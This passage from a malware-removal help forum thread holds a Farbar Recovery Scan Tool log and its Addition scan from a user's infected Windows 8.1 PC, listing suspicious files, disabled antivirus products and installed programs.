2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 21:51 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-11 21:51 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-06-11 21:49 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-06-11 21:46 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-06-11 21:44 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-06-11 21:41 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-06-11 21:40 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-06-11 21:38 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-06-11 21:38 - 2018-03-22 21:52 - 000000356 _____ C:\ProgramData\rwi.hhad
2018-06-11 21:37 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-06-11 21:36 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-06-11 21:36 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-11 21:35 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-06-11 21:35 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-06-10 22:57 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-06-09 23:31 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc
2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN
2018-06-02 21:58 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
 
==================== Files in the root of some directories =======
 
2018-03-22 21:52 - 2018-06-11 21:51 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-06-11 21:44 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-06-11 21:49 - 2018-06-11 21:49 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooehlor.sys -> Access Denied <======= ATTENTION
 
LastRegBack: 2018-05-29 22:18
 
==================== End of FRST.txt ============================


#25 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 12 June 2018 - 09:42 AM

Here's the Addition txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (11-06-2018 21:53:50)
Running from D:\
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
